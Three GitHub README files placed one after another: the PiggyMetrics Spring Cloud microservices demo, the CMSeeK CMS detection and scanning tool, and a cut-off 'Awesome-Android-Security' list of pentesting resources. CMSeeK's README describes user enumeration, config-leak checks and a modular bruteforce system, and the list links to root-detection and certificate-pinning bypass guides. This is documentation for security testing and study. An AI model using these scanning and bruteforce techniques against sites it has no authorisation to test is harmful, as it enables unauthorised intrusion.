/> <br><em>Main Menu</em><br> <img alt="Scan Result" width="600px" src="https://i.imgur.com/yiKQoZw.png" /> <br><em>Scan Result</em><br> <img alt="WordPress Scan Result" width="600px" src="https://i.imgur.com/CK4O1Yd.png" /> <br><em>WordPress Scan Result</em><br> </p> ## Opening issue: Please make sure you have the following info attached when opening a new issue: - Target - Exact copy of error or screenshot of error - Your operating system **Issues without these informations might not be answered!** ## Disclaimer: **Usage of CMSeeK for testing or exploiting websites without prior mutual consistency can be considered as an illegal activity. It is the final user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program.** ## License: CMSeeK is licensed under [GNU General Public License v3.0](https://github.com/Tuhinshubhra/CMSeeK/blob/master/LICENSE) ## Follow Me @r3dhax0r: [Twitter](https://twitter.com/r3dhax0r) || [Facebook](https://fb.com/r3dhax0r) || [Instagram](https://instagram.com/r3dhax0r) ## Team: [Team : Virtually Unvoid Defensive (VUD)](https://twitter.com/virtuallyunvoid)
[![Build Status](https://travis-ci.org/sqshq/PiggyMetrics.svg?branch=master)](https://travis-ci.org/sqshq/PiggyMetrics) [![codecov.io](https://codecov.io/github/sqshq/PiggyMetrics/coverage.svg?branch=master)](https://codecov.io/github/sqshq/PiggyMetrics?branch=master) [![GitHub license](https://img.shields.io/github/license/mashape/apistatus.svg)](https://github.com/sqshq/PiggyMetrics/blob/master/LICENCE) [![Join the chat at https://gitter.im/sqshq/PiggyMetrics](https://badges.gitter.im/sqshq/PiggyMetrics.svg)](https://gitter.im/sqshq/PiggyMetrics?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge) # Piggy Metrics **A simple way to deal with personal finances** This is a [proof-of-concept application](http://my-piggymetrics.rhcloud.com), which demonstrates [Microservice Architecture Pattern](http://martinfowler.com/microservices/) using Spring Boot, Spring Cloud and Docker. With a pretty neat user interface, by the way. ![](https://cloud.githubusercontent.com/assets/6069066/13864234/442d6faa-ecb9-11e5-9929-34a9539acde0.png) ![Piggy Metrics](https://cloud.githubusercontent.com/assets/6069066/13830155/572e7552-ebe4-11e5-918f-637a49dff9a2.gif) ## Functional services PiggyMetrics was decomposed into three core microservices. All of them are independently deployable applications, organized around certain business domains. <img width="880" alt="Functional services" src="https://cloud.githubusercontent.com/assets/6069066/13900465/730f2922-ee20-11e5-8df0-e7b51c668847.png"> #### Account service Contains general user input logic and validation: incomes/expenses items, savings and account settings. Method | Path | Description | User authenticated | Available from UI ------------- | ------------------------- | ------------- |:-------------:|:----------------:| GET | /accounts/{account} | Get specified account data | | GET | /accounts/current | Get current account data | × | × GET | /accounts/demo | Get demo account data (pre-filled incomes/expenses items, etc) | | × PUT | /accounts/current | Save current account data | × | × POST | /accounts/ | Register new account | | × #### Statistics service Performs calculations on major statistics parameters and captures time series for each account. Datapoint contains values, normalized to base currency and time period. This data is used to track cash flow dynamics in account lifetime. Method | Path | Description | User authenticated | Available from UI ------------- | ------------------------- | ------------- |:-------------:|:----------------:| GET | /statistics/{account} | Get specified account statistics | | GET | /statistics/current | Get current account statistics | × | × GET | /statistics/demo | Get demo account statistics | | × PUT | /statistics/{account} | Create or update time series datapoint for specified account | | #### Notification service Stores users contact information and notification settings (like remind and backup frequency). Scheduled worker collects required information from other services and sends e-mail messages to subscribed customers. Method | Path | Description | User authenticated | Available from UI ------------- | ------------------------- | ------------- |:-------------:|:----------------:| GET | /notifications/settings/current | Get current account notification settings | × | × PUT | /notifications/settings/current | Save current account notification settings | × | × #### Notes - Each microservice has it's own database, so there is no way to bypass API and access persistance data directly. - In this project, I use MongoDB as a primary database for each service. It might also make sense to have a polyglot persistence architecture (сhoose the type of db that is best suited to service requirements). - Service-to-service communication is quite simplified: microservices talking using only synchronous REST API. Common practice in a real-world systems is to use combination of interaction styles. For example, perform synchronous GET request to retrieve data and use asynchronous approach via Message broker for create/update operations in order to decouple services and buffer messages. However, this brings us to the [eventual consistency](http://martinfowler.com/articles/microservice-trade-offs.html#consistency) world. ## Infrastructure services There's a bunch of common patterns in distributed systems, which could help us to make described core services work. [Spring cloud](http://projects.spring.io/spring-cloud/) provides powerful tools that enhance Spring Boot applications behaviour to implement those patterns. I'll cover them briefly. <img width="880" alt="Infrastructure services" src="https://cloud.githubusercontent.com/assets/6069066/13906840/365c0d94-eefa-11e5-90ad-9d74804ca412.png"> ### Config service [Spring Cloud Config](http://cloud.spring.io/spring-cloud-config/spring-cloud-config.html) is horizontally scalable centralized configuration service for distributed systems. It uses a pluggable repository layer that currently supports local storage, Git, and Subversion. In this project, I use `native profile`, which simply loads config files from the local classpath. You can see `shared` directory in [Config service resources](https://github.com/sqshq/PiggyMetrics/tree/master/config/src/main/resources). Now, when Notification-service requests it's configuration, Config service responses with `shared/notification-service.yml` and `shared/application.yml` (which is shared between all client applications). ##### Client side usage Just build Spring Boot application with `spring-cloud-starter-config` dependency, autoconfiguration will do the rest. Now you don't need any embedded properties in your application. Just provide `bootstrap.yml` with application name and Config service url: ```yml spring: application: name: notification-service cloud: config: uri: http://config:8888 fail-fast: true ``` ##### With Spring Cloud Config, you can change app configuration dynamically. For example, [EmailService bean](https://github.com/sqshq/PiggyMetrics/blob/master/notification-service/src/main/java/com/piggymetrics/notification/service/EmailServiceImpl.java) was annotated with `@RefreshScope`. That means, you can change e-mail text and subject without rebuild and restart Notification service application. First, change required properties in Config server. Then, perform refresh request to Notification service: `curl -H "Authorization: Bearer #token#" -XPOST http://127.0.0.1:8000/notifications/refresh` Also, you could use Repository [webhooks to automate this process](http://cloud.spring.io/spring-cloud-config/spring-cloud-config.html#_push_notifications_and_spring_cloud_bus) ##### Notes - There are some limitations for dynamic refresh though. `@RefreshScope` doesn't work with `@Configuration` classes and doesn't affect `@Scheduled` methods - `fail-fast` property means that Spring Boot application will fail startup immediately, if it cannot connect to the Config Service. - There are significant [security notes](https://github.com/sqshq/PiggyMetrics#security) below ### Auth service Authorization responsibilities are completely extracted to separate server, which grants [OAuth2 tokens](https://tools.ietf.org/html/rfc6749) for the backend resource services. Auth Server is used for user authorization as well as for secure machine-to-machine communication inside a perimeter. In this project, I use [`Password credentials`](https://tools.ietf.org/html/rfc6749#section-4.3) grant type for users authorization (since it's used only by native PiggyMetrics UI) and [`Client Credentials`](https://tools.ietf.org/html/rfc6749#section-4.4) grant for microservices authorization. Spring Cloud Security provides convenient annotations and autoconfiguration to make this really easy to implement from both server and client side. You can learn more about it in [documentation](http://cloud.spring.io/spring-cloud-security/spring-cloud-security.html) and check configuration details in [Auth Server code](https://github.com/sqshq/PiggyMetrics/tree/master/auth-service/src/main/java/com/piggymetrics/auth). From the client side, everything works exactly the same as with traditional session-based authorization. You can retrieve `Principal` object from request, check user's roles and other stuff with expression-based access control and `@PreAuthorize` annotation. Each client in PiggyMetrics (account-service, statistics-service, notification-service and browser) has a scope: `server` for backend services, and `ui` - for the browser. So we can also protect controllers from external access, for example: ``` java @PreAuthorize("#oauth2.hasScope('server')") @RequestMapping(value = "accounts/{name}", method = RequestMethod.GET) public List<DataPoint> getStatisticsByAccountName(@PathVariable String name) { return statisticsService.findByAccountName(name); } ``` ### API Gateway As you can see, there are three core services, which expose external API to client. In a real-world systems, this number can grow very quickly as well as whole system complexity. Actually, hundreds of services might be involved in rendering of one complex webpage. In theory, a client could make requests to each of the microservices directly. But obviously, there are challenges and limitations with this option, like necessity to know all endpoints addresses, perform http request for each peace of information separately, merge the result on a client side. Another problem is non web-friendly protocols which might be used on the backend. Usually a much better approach is to use API Gateway. It is a single entry point into the system, used to handle requests by routing them to the appropriate backend service or by invoking multiple backend services and [aggregating the results](http://techblog.netflix.com/2013/01/optimizing-netflix-api.html). Also, it can be used for authentication, insights, stress and canary testing, service migration, static response handling, active traffic management. Netflix opensourced [such an edge service](http://techblog.netflix.com/2013/06/announcing-zuul-edge-service-in-cloud.html), and now with Spring Cloud we can enable it with one `@EnableZuulProxy` annotation. In this project, I use Zuul to store static content (ui application) and to route requests to appropriate microservices. Here's a simple prefix-based routing configuration for Notification service: ```yml zuul: routes: notification-service: path: /notifications/** serviceId: notification-service stripPrefix: false ``` That means all requests starting with `/notifications` will be routed to Notification service. There is no hardcoded address, as you can see. Zuul uses [Service discovery](https://github.com/sqshq/PiggyMetrics/blob/master/README.md#service-discovery) mechanism to locate Notification service instances and also [Circuit Breaker and Load Balancer](https://github.com/sqshq/PiggyMetrics/blob/master/README.md#http-client-load-balancer-and-circuit-breaker), described below. ### Service discovery Another commonly known architecture pattern is Service discovery. It allows automatic detection of network locations for service instances, which could have dynamically assigned addresses because of auto-scaling, failures and upgrades. The key part of Service discovery is Registry. I use Netflix Eureka in this project. Eureka is a good example of the client-side discovery pattern, when client is responsible for determining locations of available service instances (using Registry server) and load balancing requests across them. With Spring Boot, you can easily build Eureka Registry with `spring-cloud-starter-eureka-server` dependency, `@EnableEurekaServer` annotation and simple configuration properties. Client support enabled with `@EnableDiscoveryClient` annotation an `bootstrap.yml` with application name: ``` yml spring: application: name: notification-service ``` Now, on application startup, it will register with Eureka Server and provide meta-data, such as host and port, health indicator URL, home page etc. Eureka receives heartbeat messages from each instance belonging to a service. If the heartbeat fails over a configurable timetable, the instance will be removed from the registry. Also, Eureka provides a simple interface, where you can track running services and a number of available instances: `http://localhost:8761` ### Load balancer, Circuit breaker and Http client Netflix OSS provides another great set of tools. #### Ribbon Ribbon is a client side load balancer which gives you a lot of control over the behaviour of HTTP and TCP clients. Compared to a traditional load balancer, there is no need in additional hop for every over-the-wire invocation - you can contact desired service directly. Out of the box, it natively integrates with Spring Cloud and Service Discovery. [Eureka Client](https://github.com/sqshq/PiggyMetrics#service-discovery) provides a dynamic list of available servers so Ribbon could balance between them. #### Hystrix Hystrix is the implementation of [Circuit Breaker pattern](http://martinfowler.com/bliki/CircuitBreaker.html), which gives a control over latency and failure from dependencies accessed over the network. The main idea is to stop cascading failures in a distributed environment with a large number of microservices. That helps to fail fast and recover as soon as possible - important aspects of fault-tolerant systems that self-heal. Besides circuit breaker control, with Hystrix you can add a fallback method that will be called to obtain a default value in case the main command fails. Moreover, Hystrix generates metrics on execution outcomes and latency for each command, that we can use to [monitor system behavior](https://github.com/sqshq/PiggyMetrics#monitor-dashboard). #### Feign Feign is a declarative Http client, which seamlessly integrates with Ribbon and Hystrix. Actually, with one `spring-cloud-starter-feign` dependency and `@EnableFeignClients` annotation you have a full set of Load balancer, Circuit breaker and Http client with sensible ready-to-go default configuration. Here is an example from Account Service: ``` java @FeignClient(name = "statistics-service") public interface StatisticsServiceClient { @RequestMapping(method = RequestMethod.PUT, value = "/statistics/{accountName}", consumes = MediaType.APPLICATION_JSON_UTF8_VALUE) void updateStatistics(@PathVariable("accountName") String accountName, Account account); } ``` - Everything you need is just an interface - You can share `@RequestMapping` part between Spring MVC controller and Feign methods - Above example specifies just desired service id - `statistics-service`, thanks to autodiscovery through Eureka (but obviously you can access any resource with a specific url) ### Monitor dashboard In this project configuration, each microservice with Hystrix on board pushes metrics to Turbine via Spring Cloud Bus (with AMQP broker). The Monitoring project is just a small Spring boot application with [Turbine](https://github.com/Netflix/Turbine) and [Hystrix Dashboard](https://github.com/Netflix/Hystrix/tree/master/hystrix-dashboard). See below [how to get it up and running](https://github.com/sqshq/PiggyMetrics#how-to-run-all-the-things). Let's see our system behavior under load: Account service calls Statistics service and it responses with a vary imitation delay. Response timeout threshold is set to 1 second. <img width="880" src="https://cloud.githubusercontent.com/assets/6069066/14194375/d9a2dd80-f7be-11e5-8bcc-9a2fce753cfe.png"> <img width="212" src="https://cloud.githubusercontent.com/assets/6069066/14127349/21e90026-f628-11e5-83f1-60108cb33490.gif"> | <img width="212" src="https://cloud.githubusercontent.com/assets/6069066/14127348/21e6ed40-f628-11e5-9fa4-ed527bf35129.gif"> | <img width="212" src="https://cloud.githubusercontent.com/assets/6069066/14127346/21b9aaa6-f628-11e5-9bba-aaccab60fd69.gif"> | <img width="212" src="https://cloud.githubusercontent.com/assets/6069066/14127350/21eafe1c-f628-11e5-8ccd-a6b6873c046a.gif"> --- |--- |--- |--- | | `0 ms delay` | `500 ms delay` | `800 ms delay` | `1100 ms delay` | Well behaving system. The throughput is about 22 requests/second. Small number of active threads in Statistics service. The median service time is about 50 ms. | The number of active threads is growing. We can see purple number of thread-pool rejections and therefore about 30-40% of errors, but circuit is still closed. | Half-open state: the ratio of failed commands is more than 50%, the circuit breaker kicks in. After sleep window amount of time, the next request is let through. | 100 percent of the requests fail. The circuit is now permanently open. Retry after sleep time won't close circuit again, because the single request is too slow. ### Log analysis Centralized logging can be very useful when attempting to identify problems in a distributed environment. Elasticsearch, Logstash and Kibana stack lets you search and analyze your logs, utilization and network activity data with ease. Ready-to-go Docker configuration described [in my other project](http://github.com/sqshq/ELK-docker). ## Security An advanced security configuration is beyond the scope of this proof-of-concept project. For a more realistic simulation of a real system, consider to use https, JCE keystore to encrypt Microservices passwords and Config server properties content (see [documentation](http://cloud.spring.io/spring-cloud-config/spring-cloud-config.html#_security) for details). ## Infrastructure automation Deploying microservices, with their interdependence, is much more complex process than deploying monolithic application. It is important to have fully automated infrastructure. We can achieve following benefits with Continuous Delivery approach: - The ability to release software anytime - Any build could end up being a release - Build artifacts once - deploy as needed Here is a simple Continuous Delivery workflow, implemented in this project: <img width="880" src="https://cloud.githubusercontent.com/assets/6069066/14159789/0dd7a7ce-f6e9-11e5-9fbb-a7fe0f4431e3.png"> In this [configuration](https://github.com/sqshq/PiggyMetrics/blob/master/.travis.yml), Travis CI builds tagged images for each successful git push. So, there are always `latest` image for each microservice on [Docker Hub](https://hub.docker.com/r/sqshq/) and older images, tagged with git commit hash. It's easy to deploy any of them and quickly rollback, if needed. ## How to run all the things? Keep in mind, that you are going to start 8 Spring Boot applications, 4 MongoDB instances and RabbitMq. Make sure you have `4 Gb` RAM available on your machine. You can always run just vital services though: Gateway, Registry, Config, Auth Service and Account Service. #### Before you start - Install Docker and Docker Compose. - Export environment variables: `CONFIG_SERVICE_PASSWORD`, `NOTIFICATION_SERVICE_PASSWORD`, `STATISTICS_SERVICE_PASSWORD`, `ACCOUNT_SERVICE_PASSWORD`, `MONGODB_PASSWORD` (make sure they were exported: `printenv`) - Make sure to build the project: `mvn package [-DskipTests]` #### Production mode In this mode, all latest images will be pulled from Docker Hub. Just copy `docker-compose.yml` and hit `docker-compose up` #### Development mode If you'd like to build images yourself (with some changes in the code, for example), you have to clone all repository and build artifacts with maven. Then, run `docker-compose -f docker-compose.yml -f docker-compose.dev.yml up` `docker-compose.dev.yml` inherits `docker-compose.yml` with additional possibility to build images locally and expose all containers ports for convenient development. #### Important endpoints - http://localhost:80 - Gateway - http://localhost:8761 - Eureka Dashboard - http://localhost:9000/hystrix - Hystrix Dashboard (paste Turbine stream link on the form) - http://localhost:8989 - Turbine stream (source for the Hystrix Dashboard) - http://localhost:15672 - RabbitMq management (default login/password: guest/guest) #### Notes All Spring Boot applications require already running [Config Server](https://github.com/sqshq/PiggyMetrics#config-service) for startup. But we can start all containers simultaneously because of `depends_on` docker-compose option. Also, Service Discovery mechanism needs some time after all applications startup. Any service is not available for discovery by clients until the instance, the Eureka server and the client all have the same metadata in their local cache, so it could take 3 heartbeats. Default heartbeat period is 30 seconds. ## Contributions welcome! PiggyMetrics is open source, and would greatly appreciate your help. Feel free to suggest and implement improvements.
<p align='center'> <img src="https://i.imgur.com/5VYs1m2.png" alt="Logo"> <br> <a href="https://github.com/Tuhinshubhra/CMSeeK/releases/tag/v.1.1.3"><img src="https://img.shields.io/badge/Version-1.1.3-brightgreen.svg?style=style=flat-square" alt="version"></a> <a href="https://github.com/Tuhinshubhra/CMSeeK/"><img src="https://img.shields.io/badge/python-3-orange.svg?style=style=flat-square" alt="Python Version"></a> <a href="https://github.com/Tuhinshubhra/CMSeeK/stargazers"><img src="https://img.shields.io/github/stars/Tuhinshubhra/CMSeeK.svg" alt="GitHub stars" /></a> <a href="https://github.com/Tuhinshubhra/CMSeeK/blob/master/LICENSE"><img src="https://img.shields.io/github/license/Tuhinshubhra/CMSeeK.svg" alt="GitHub license" /></a> <a href="https://inventory.rawsec.ml/tools.html#CMSeek"><img src="https://inventory.rawsec.ml/img/badges/Rawsec-inventoried-FF5050_flat.svg" alt="Rawsec's CyberSecurity Inventory" /></a> <a href="https://twitter.com/r3dhax0r"><img src="https://img.shields.io/twitter/url/https/github.com/Tuhinshubhra/CMSeeK.svg?style=social" alt="Twitter" /></a> </p> ## What is a CMS? > A content management system (CMS) manages the creation and modification of digital content. It typically supports multiple users in a collaborative environment. Some noteable examples are: *WordPress, Joomla, Drupal etc*. ## Release History ``` - Version 1.1.3 [25-07-2020] - Version 1.1.2 [19-05-2019] - Version 1.1.1 [01-02-2019] - Version 1.1.0 [28-08-2018] - Version 1.0.9 [21-08-2018] - Version 1.0.8 [14-08-2018] - Version 1.0.7 [07-08-2018] ... ``` [Changelog File](https://github.com/Tuhinshubhra/CMSeeK/blob/master/CHANGELOG) ## Functions Of CMSeek: - Basic CMS Detection of over 170 CMS - Drupal version detection - Advanced Wordpress Scans - Detects Version - User Enumeration - Plugins Enumeration - Theme Enumeration - Detects Users (3 Detection Methods) - Looks for Version Vulnerabilities and much more! - Advanced Joomla Scans - Version detection - Backup files finder - Admin page finder - Core vulnerability detection - Directory listing check - Config leak detection - Various other checks - Modular bruteforce system - Use pre made bruteforce modules or create your own and integrate with it ## Requirements and Compatibility: CMSeeK is built using **python3**, you will need python3 to run this tool and is compitable with **unix based systems** as of now. Windows support will be added later. CMSeeK relies on **git** for auto-update so make sure git is installed. ## Installation and Usage: It is fairly easy to use CMSeeK, just make sure you have python3 and git (just for cloning the repo) installed and use the following commands: - git clone `https://github.com/Tuhinshubhra/CMSeeK` - cd CMSeeK - pip/pip3 install -r requirements.txt For guided scanning: - python3 cmseek.py Else: - python3 cmseek.py -u <target_url> [...] Help menu from the program: ``` USAGE: python3 cmseek.py (for guided scanning) OR python3 cmseek.py [OPTIONS] <Target Specification> SPECIFING TARGET: -u URL, --url URL Target Url -l LIST, --list LIST Path of the file containing list of sites for multi-site scan (comma separated) MANIPULATING SCAN: -i cms, --ignore--cms cms Specify which CMS IDs to skip in order to avoid flase positive. separated by comma "," --strict-cms cms Checks target against a list of provided CMS IDs. separated by comma "," --skip-scanned Skips target if it's CMS was previously detected. RE-DIRECT: --follow-redirect Follows all/any redirect(s) --no-redirect Skips all redirects and tests the input target(s) USER AGENT: -r, --random-agent Use a random user agent --googlebot Use Google bot user agent --user-agent USER_AGENT Specify a custom user agent OUTPUT: -v, --verbose Increase output verbosity VERSION & UPDATING: --update Update CMSeeK (Requires git) --version Show CMSeeK version and exit HELP & MISCELLANEOUS: -h, --help Show this help message and exit --clear-result Delete all the scan result --batch Never ask you to press enter after every site in a list is scanned EXAMPLE USAGE: python3 cmseek.py -u example.com # Scan example.com python3 cmseek.py -l /home/user/target.txt # Scan the sites specified in target.txt (comma separated) python3 cmseek.py -u example.com --user-agent Mozilla 5.0 # Scan example.com using custom user-Agent Mozilla is 5.0 used here python3 cmseek.py -u example.com --random-agent # Scan example.com using a random user-Agent python3 cmseek.py -v -u example.com # enabling verbose output while scanning example.com ``` ## Checking For Update: You can check for update either from the main menu or use `python3 cmseek.py --update` to check for update and apply auto update. P.S: Please make sure you have `git` installed, CMSeeK uses git to apply auto update. ## Detection Methods: CMSeek detects CMS via the following: - HTTP Headers - Generator meta tag - Page source code - robots.txt ## Supported CMSs: CMSeeK currently can detect **170+** CMS. Check the list here: [cmss.py](https://github.com/Tuhinshubhra/CMSeeK/blob/master/cmseekdb/cmss.py) file which is present in the `cmseekdb` directory. All the cmss are stored in the following way: ``` cmsID = { 'name':'Name Of CMS', 'url':'Official URL of the CMS', 'vd':'Version Detection (0 for no, 1 for yes)', 'deeps':'Deep Scan (0 for no 1 for yes)' } ``` ## Scan Result: All of your scan results are stored in a json file named `cms.json`, you can find the logs inside the `Result\<Target Site>` directory, and as of the bruteforce results they're stored in a txt file under the site's result directory as well. Here is an example of the json report log: ![Json Log](https://i.imgur.com/5dA9jQg.png) ## Bruteforce Modules: CMSeek has a modular bruteforce system meaning you can add your custom made bruteforce modules to work with cmseek. A proper documentation for creating modules will be created shortly but in case you already figured out how to (pretty easy once you analyze the pre-made modules) all you need to do is this: 1. Add a comment exactly like this `# <Name Of The CMS> Bruteforce module`. This will help CMSeeK to know the name of the CMS using regex 2. Add another comment `### cmseekbruteforcemodule`, this will help CMSeeK to know it is a module 3. Copy and paste the module in the `brutecms` directory under CMSeeK's directory 4. Open CMSeeK and Rebuild Cache using `R` as the input in the first menu. 5. If everything is done right you'll see something like this (refer to screenshot below) and your module will be listed in bruteforce menu the next time you open CMSeeK. <p align='center'> <img alt="Cache Rebuild Screenshot" width="600px" src="https://i.imgur.com/yhdzTYr.png" /> </p> ## Need More Reasons To Use CMSeeK? If not anything you can always enjoy exiting CMSeeK *(please don't)*, it will bid you goodbye in a random goodbye message in various languages. Also you can try reading comments in the code those are pretty random and weird!!! ## Screenshots: <p align="center"> <img alt="Main Menu" src="https://i.imgur.com/Eij6QvX.png" /> <br><em>Main Menu</em><br> <img alt="Scan Result" src="https://i.imgur.com/u0iyLdB.png" /> <br><em>Scan Result</em><br> <img alt="WordPress Scan Result" src="https://i.imgur.com/cOtCJLj.png" /> <br><em>WordPress Scan Result</em><br> </p> ## Guidelines for opening an issue: Please make sure you have the following info attached when opening a new issue: - Target - Exact copy of error or screenshot of error - Your operating system and python version **Issues without these informations might not be answered!** ## Disclaimer: **Usage of CMSeeK for testing or exploiting websites without prior mutual consistency can be considered as an illegal activity. It is the final user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program.** ## License: CMSeeK is licensed under [GNU General Public License v3.0](https://github.com/Tuhinshubhra/CMSeeK/blob/master/LICENSE) ## Follow Me @r3dhax0r: [Twitter](https://twitter.com/r3dhax0r)
# Awesome-Android-Security ![awesome](https://awesome.re/badge.svg) ![Screenshot](img/androidsec.png) # Table of Contents - [Blog](#blog) - [How To's](#how-tos) - [Paper](#paper) - [Books](#books) - [Course](#course) - [Tools](#tools) * [Static Analysis Tools](#Static-Analysis) * [Dynamic Analysis Tools](#Dynamic-Analysis) * [Online APK Analyzers](#Online-APK-Analyzers) * [Online APK Decompiler](#Online-APK-Decompiler) - [Labs](#labs) - [Talks](#talks) - [Misc](#misc) - [Bug Bounty & Writeups](#Bug-Bounty-&-Writeup) - [Cheat Sheet](#Cheat-Sheet) - [Checklist](#Checklist) - [Bug Bounty Report](#Bug-Bounty-Report) # Blog * [AAPG - Android application penetration testing guide](https://nightowl131.github.io/AAPG/) * [TikTok: three persistent arbitrary code executions and one theft of arbitrary files](https://blog.oversecured.com/Oversecured-detects-dangerous-vulnerabilities-in-the-TikTok-Android-app/) * [Persistent arbitrary code execution in Android's Google Play Core Library: details, explanation and the PoC - CVE-2020-8913](https://blog.oversecured.com/Oversecured-automatically-discovers-persistent-code-execution-in-the-Google-Play-Core-Library/) * [Android: Access to app protected components](https://blog.oversecured.com/Android-Access-to-app-protected-components/) * [Android: arbitrary code execution via third-party package contexts](https://blog.oversecured.com/Android-arbitrary-code-execution-via-third-party-package-contexts/) * [Android Pentesting Labs - Step by Step guide for beginners](https://medium.com/bugbountywriteup/android-pentesting-lab-4a6fe1a1d2e0) * [An Android Hacking Primer](https://medium.com/swlh/an-android-hacking-primer-3390fef4e6a0) * [An Android Security tips](https://developer.android.com/training/articles/security-tips) * [OWASP Mobile Security Testing Guide](https://www.owasp.org/index.php/OWASP_Mobile_Security_Testing_Guide) * [Security Testing for Android Cross Platform Application](https://3xpl01tc0d3r.blogspot.com/2019/09/security-testing-for-android-app-part1.html) * [Dive deep into Android Application Security](https://blog.0daylabs.com/2019/09/18/deep-dive-into-Android-security/) * [Pentesting Android Apps Using Frida](https://www.notsosecure.com/pentesting-android-apps-using-frida/) * [Mobile Security Testing Guide](https://mobile-security.gitbook.io/mobile-security-testing-guide/) * [Android Applications Reversing 101](https://www.evilsocket.net/2017/04/27/Android-Applications-Reversing-101/#.WQND0G3TTOM.reddit) * [Android Security Guidelines](https://developer.box.com/en/guides/security/) * [Android WebView Vulnerabilities](https://pentestlab.blog/2017/02/12/android-webview-vulnerabilities/) * [OWASP Mobile Top 10](https://www.owasp.org/index.php/OWASP_Mobile_Top_10) * [Practical Android Phone Forensics](https://resources.infosecinstitute.com/practical-android-phone-forensics/) * [Mobile Pentesting With Frida](https://drive.google.com/file/d/1JccmMLi6YTnyRrp_rk6vzKrUX3oXK_Yw/view) * [Zero to Hero - Mobile Application Testing - Android Platform](https://nileshsapariya.blogspot.com/2016/11/zero-to-hero-mobile-application-testing.html) # How To's * [How To Configuring Burp Suite With Android Nougat](https://blog.ropnop.com/configuring-burp-suite-with-android-nougat/) * [How To Bypassing Xamarin Certificate Pinning](https://www.gosecure.net/blog/2020/04/06/bypassing-xamarin-certificate-pinning-on-android/) * [How To Bypassing Android Anti-Emulation](https://www.juanurs.com/Bypassing-Android-Anti-Emulation-Part-I/) * [How To Secure an Android Device](https://source.android.com/security) * [Android Root Detection Bypass Using Objection and Frida Scripts](https://medium.com/@GowthamR1/android-root-detection-bypass-using-objection-and-frida-scripts-d681d30659a7) * [Root Detection Bypass By Manual Code Manipulation.](https://medium.com/@sarang6489/root-detection-bypass-by-manual-code-manipulation-5478858f4ad1) * [Magisk Systemless Root - Detection and Remediation](https://www.mobileiron.com/en/blog/magisk-android-rooting) * [How to use FRIDA to bruteforce Secure Startup with FDE-encryption on a Samsung G935F running Android 8](https://github.com/Magpol/fridafde) # Paper * [AndrODet: An adaptive Android obfuscation detector](https://arxiv.org/pdf/1910.06192.pdf) * [GEOST BOTNET - the discovery story of a new Android banking trojan](http://public.avast.com/research/VB2019-Garcia-etal.pdf) * [Dual-Level Android Malware Detection](https://www.mdpi.com/2073-8994/12/7/1128) # Books * [SEI CERT Android Secure Coding Standard](https://www.securecoding.cert.org/confluence/display/android/Android+Secure+Coding+Standard) * [Android Security Internals](https://www.oreilly.com/library/view/android-security-internals/9781457185496/) * [Android Cookbook](https://androidcookbook.com/) * [Android Hacker's Handbook](https://www.amazon.com/Android-Hackers-Handbook-Joshua-Drake/dp/111860864X) * [Android Security Cookbook](https://www.packtpub.com/in/application-development/android-security-cookbook) * [The Mobile Application Hacker's Handbook](https://www.amazon.in/Mobile-Application-Hackers-Handbook-ebook/dp/B00TSA6KLG) * [Android Malware and Analysis](https://www.oreilly.com/library/view/android-malware-and/9781482252200/) * [Android Security: Attacks and Defenses](https://www.crcpress.com/Android-Security-Attacks-and-Defenses/Misra-Dubey/p/book/9780367380182) * [Learning Penetration Testing For Android Devices](https://www.amazon.com/Learning-Penetration-Testing-Android-Devices-ebook/dp/B077L7SNG8) # Course * [Android Reverse Engineering_pt-BR](https://www.youtube.com/watch?v=eHdDS2e_qf0&list=PL4zZ9lJ-RCbfv6f6Jc8cJ4ljKqENkTfi7) * [Learning-Android-Security](https://www.lynda.com/Android-tutorials/Learning-Android-Security/689762-2.html) * [Advanced Android Development](https://developer.android.com/courses/advanced-training/overview) * [Learn the art of mobile app development](https://www.edx.org/professional-certificate/harvardx-computer-science-and-mobile-apps) * [Learning Android Malware Analysis](https://www.linkedin.com/learning/learning-android-malware-analysis) * [Android App Reverse Engineering 101](https://maddiestone.github.io/AndroidAppRE/) * [MASPT V2](https://www.elearnsecurity.com/course/mobile_application_security_and_penetration_testing/) * [Android Pentration Testing(Persian)](https://www.youtube.com/watch?v=XqS_bA6XfNU&list=PLvVo-xqnJCI7rftDaiEtWFLXlkxN-1Nxn) # Tools #### Static Analysis * [Apktool:A tool for reverse engineering Android apk files](https://ibotpeaches.github.io/Apktool/) * [quark-engine - An Obfuscation-Neglect Android Malware Scoring System](https://github.com/quark-engine/quark-engine) * [DeGuard:Statistical Deobfuscation for Android](http://apk-deguard.com/) * [jadx - Dex to Java decompiler](https://github.com/skylot/jadx/releases) * [Amandroid – A Static Analysis Framework](http://pag.arguslab.org/argus-saf) * [Androwarn – Yet Another Static Code Analyzer](https://github.com/maaaaz/androwarn/) * [Droid Hunter – Android application vulnerability analysis and Android pentest tool](https://github.com/hahwul/droid-hunter) * [Error Prone – Static Analysis Tool](https://github.com/google/error-prone) * [Findbugs – Find Bugs in Java Programs](http://findbugs.sourceforge.net/downloads.html) * [Find Security Bugs – A SpotBugs plugin for security audits of Java web applications.](https://github.com/find-sec-bugs/find-sec-bugs/) * [Flow Droid – Static Data Flow Tracker](https://github.com/secure-software-engineering/FlowDroid) * [Smali/Baksmali – Assembler/Disassembler for the dex format](https://github.com/JesusFreke/smali) * [Smali-CFGs – Smali Control Flow Graph’s](https://github.com/EugenioDelfa/Smali-CFGs) * [SPARTA – Static Program Analysis for Reliable Trusted Apps](https://www.cs.washington.edu/sparta) * [Gradle Static Analysis Plugin](https://github.com/novoda/gradle-static-analysis-plugin) * [Checkstyle – A tool for checking Java source code](https://github.com/checkstyle/checkstyle) * [PMD – An extensible multilanguage static code analyzer](https://github.com/pmd/pmd) * [Soot – A Java Optimization Framework](https://github.com/Sable/soot) * [Android Quality Starter](https://github.com/pwittchen/android-quality-starter) * [QARK – Quick Android Review Kit](https://github.com/linkedin/qark) * [Infer – A Static Analysis tool for Java, C, C++ and Objective-C](https://github.com/facebook/infer) * [Android Check – Static Code analysis plugin for Android Project](https://github.com/noveogroup/android-check) * [FindBugs-IDEA Static byte code analysis to look for bugs in Java code](https://plugins.jetbrains.com/plugin/3847-findbugs-idea) * [APK Leaks – Scanning APK file for URIs, endpoints & secrets](https://github.com/dwisiswant0/apkleaks) * [Trueseeing – fast, accurate and resillient vulnerabilities scanner for Android apps](https://github.com/monolithworks/trueseeing) * [StaCoAn – crossplatform tool which aids developers, 